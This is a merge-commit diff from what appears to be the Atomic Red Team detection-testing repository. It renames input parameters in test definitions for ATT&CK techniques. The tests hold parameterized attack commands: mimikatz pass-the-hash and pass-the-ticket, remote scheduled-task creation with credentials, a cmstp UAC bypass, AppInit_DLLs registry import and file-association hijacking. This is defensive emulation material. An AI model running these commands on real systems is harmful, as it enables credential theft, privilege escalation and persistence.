Merge pull request #318 from redcanaryco/Technique-fixing

Technique fixing
2018-08-31 06:06:12 -06:00
parent 7d8b526bd8 d959144e14
commit 95bf8450c2
14 changed files with 27 additions and 27 deletions
@@ -44,6 +44,6 @@ Change Default File Association From cmd.exe

 #### Run it with `command_prompt`!
 ```
-cmd.exe assoc #{extension_to_change}="#{thing_to_execute}"
+cmd.exe assoc #{extension_to_change}="#{target_exenstion_handler}"
 ```
 <br/>
@@ -21,4 +21,4 @@ atomic_tests:
  executor:
    name: command_prompt
    command: |
-      cmd.exe assoc #{extension_to_change}="#{thing_to_execute}"
+      cmd.exe assoc #{extension_to_change}="#{target_exenstion_handler}"
@@ -88,6 +88,6 @@ Create a task on a remote system

 #### Run it with `command_prompt`!
 ```
-SCHTASKS /Create /S #{target} /RU #{UserName} /RP #{Password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
+SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
 ```
 <br/>
@@ -35,6 +35,7 @@ atomic_tests:
    name: command_prompt
    command: |
      SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
+
 - name: Scheduled task Remote
  description: |
      Create a task on a remote system
@@ -65,4 +66,4 @@ atomic_tests:
  executor:
    name: command_prompt
    command: |
-      SCHTASKS /Create /S #{target} /RU #{UserName} /RP #{Password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
+      SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
@@ -29,11 +29,11 @@ Testing uncommonly used port utilizing PowerShell
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
 | port | Specify uncommon port number | String | 8081|
-| hostname | Specify target hostname | String | google.com|
+| domain | Specify target hostname | String | google.com|

 #### Run it with `powershell`!
 ```
-test-netconnection -ComputerName #{hostname} -port #{port}
+test-netconnection -ComputerName #{domain} -port #{port}
 ```
 <br/>
 <br/>
@@ -48,10 +48,10 @@ Testing uncommonly used port utilizing telnet.
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
 | port | Specify uncommon port number | String | 8081|
-| hostname | Specify target hostname | String | google.com|
+| domain | Specify target hostname | String | google.com|

 #### Run it with `sh`!
 ```
-telnet #{hostname} #{port}
+telnet #{domain} #{port}
 ```
 <br/>
@@ -15,7 +15,7 @@ atomic_tests:
      description: Specify uncommon port number
      type: String
      default: 8081
-    hostname:
+    domain:
      description: Specify target hostname
      type: String
      default: google.com
@@ -23,7 +23,7 @@ atomic_tests:
  executor:
    name: powershell
    command: |
-      test-netconnection -ComputerName #{hostname} -port #{port}
+      test-netconnection -ComputerName #{domain} -port #{port}

 - name: Testing usage of uncommonly used port
  description: |
@@ -38,7 +38,7 @@ atomic_tests:
      description: Specify uncommon port number
      type: String
      default: 8081
-    hostname:
+    domain:
      description: Specify target hostname
      type: String
      default: google.com
@@ -46,5 +46,4 @@ atomic_tests:
  executor:
    name: sh
    command: |
-      telnet #{hostname} #{port}
-
+      telnet #{domain} #{port}
@@ -33,13 +33,13 @@ Note: must dump hashes first
 #### Inputs
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| user | username | string | Administrator|
+| user_name | username | string | Administrator|
 | domain | domain | string | atomic.local|
 | ntlm | ntlm hash | string | cc36cf7a8514893efccd3324464tkg1a|

 #### Run it with `command_prompt`!
 ```
-mimikatz # sekurlsa::pth /user:#{user} /domain:#{domain} /ntlm:#{ntlm}
+mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
 ```
 <br/>
 <br/>
@@ -52,6 +52,6 @@ Similar to PTH, but attacking Kerberos

 #### Run it with `command_prompt`!
 ```
-mimikatz # kerberos::ptt #{username}@#{Domain}
+mimikatz # kerberos::ptt #{user_name}@#{domain}
 ```
 <br/>
@@ -12,7 +12,7 @@ atomic_tests:
    - windows

  input_arguments:
-    user:
+    user_name:
      description: username
      type: string
      default: Administrator
@@ -28,7 +28,7 @@ atomic_tests:
  executor:
    name: command_prompt
    command: |
-      mimikatz # sekurlsa::pth /user:#{user} /domain:#{domain} /ntlm:#{ntlm}
+      mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}

 - name: Mimikatz Kerberos Ticket Attack
  description: |
@@ -40,4 +40,4 @@ atomic_tests:
  executor:
    name: command_prompt
    command: |
-      mimikatz # kerberos::ptt #{username}@#{Domain}
+      mimikatz # kerberos::ptt #{user_name}@#{domain}
@@ -38,6 +38,6 @@ AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded i

 #### Run it with `command_prompt`!
 ```
-reg.exe import #{file_name}
+reg.exe import #{registry_file}
 ```
 <br/>
@@ -18,4 +18,4 @@ atomic_tests:
  executor:
    name: command_prompt
    command: |
-      reg.exe import #{file_name}
+      reg.exe import #{registry_file}
@@ -34,7 +34,7 @@ Identify the system time

 #### Run it with `command_prompt`!
 ```
-net time \\#{computername}
+net time \\#{computer_name}
 w32tm /tz
 ```
 <br/>
@@ -19,7 +19,7 @@ atomic_tests:
  executor:
    name: command_prompt
    command: |
-      net time \\#{computername}
+      net time \\#{computer_name}
      w32tm /tz

 - name: System Time Discovery - PowerShell
@@ -56,10 +56,10 @@ Adversaries may invoke cmd.exe (or other malicious commands) by embedding them i
 #### Inputs
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| output_file | Path to the INF file | path | T1191_uacbypass.inf|
+| inf_file_uac | Path to the INF file | path | T1191_uacbypass.inf|

 #### Run it with `command_prompt`!
 ```
-cmstp.exe #{inf_file_path} /au
+cmstp.exe #{inf_file_uac} /au
 ```
 <br/>
@@ -28,7 +28,7 @@ atomic_tests:
    - windows

  input_arguments:
-    output_file:
+    inf_file_uac:
      description: Path to the INF file
      type: path
      default: T1191_uacbypass.inf
@@ -36,4 +36,4 @@ atomic_tests:
  executor:
    name: command_prompt
    command: |
-      cmstp.exe #{inf_file_path} /au
+      cmstp.exe #{inf_file_uac} /au